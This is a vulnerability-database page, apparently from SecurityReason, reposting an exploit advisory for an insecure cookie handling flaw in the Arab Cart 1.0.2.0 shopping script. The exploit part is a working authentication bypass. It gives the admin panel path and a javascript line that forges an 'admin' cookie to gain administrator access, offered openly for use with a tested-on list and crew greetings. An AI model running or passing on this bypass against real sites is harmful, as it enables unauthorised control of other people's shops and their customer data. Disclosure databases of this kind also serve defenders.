|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  World Laboratory of Bugtraq Database |
||||||||||
SecurityAlert : None
Credit : indoushka SecurityRisk : Medium  (About) Remote : Yes Local : No Status : Bug
Text : =========================================================================== ============= | # Title : Arab Cart Version 1.0.2.0 Insecure Cookie Handling Vulnerability | # Author : indoushka | # email : indoushka@dgsn.dz | # Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860) | | # Web Site : http://sourceforge.net/projects/arab-cart/ | # Script : Copyright ArabCART © .2010 | # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu) | # Bug : Insecure Cookie Handling Vulnerability | ====================== Exploit By indoushka ================================= # Exploit : 1- http://127.0.0.1/arabCart/admincp/ 2- javascript:document.cookie="admin=upass;path=/"; 3- Refrash your pag and go back tested in IE 6 + Opera 10.10 Dz-Ghost Team ===== Saoucha * Star08 * Redda * Silitoad * Xproratix ========================================== Greetz : Exploit-db Team : Audyt bezpieczeństwaSecurity AuditAnaliza powłamaniowa References : None If you want change this note, please use UCP
|
||||||||||
| Alert | ||
Allow attacker to denial of service apache 2.2.17 server |
||
| Apache |  |
|
- 2011-05-13| Copyright © SecurityReason.com. All Rights Reserved. |